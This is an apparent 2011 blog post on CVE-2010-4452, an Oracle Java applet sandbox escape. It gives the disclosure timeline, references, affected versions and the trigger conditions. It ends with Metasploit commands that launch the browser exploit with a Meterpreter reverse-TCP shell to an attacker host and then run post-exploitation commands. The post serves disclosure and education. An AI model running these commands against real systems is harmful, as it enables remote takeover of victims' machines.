Mar 21, 2011

Oracle Java Applet2ClassLoader Remote Code Execution Exploit

CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit






Description: Timeline :
Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI the 2010-09-28
Coordinated public release of advisory the 2011-02-15
Vulnerability details publicly released by Frederic Hoguin the 2011-03-11
Metasploit PoC provided the 2011-03-15

PoC provided by:
Frederic Hoguin
jduck

Reference(s) :
CVE-2010-4452
ZDI-11-084
OSVDB-71193

Affected versions :
Oracle JRE 6 & JDK 6 Update 23 and before

Tested on Windows XP SP3 with :
Oracle JRE 6 Update 16

Description :
This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with: 1. A "codebase" parameter that points at a trusted directory 2. A "code" parameter that is a URL that does not contain any dots the applet will run outside of the sandbox.

Metasploit demo :

use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)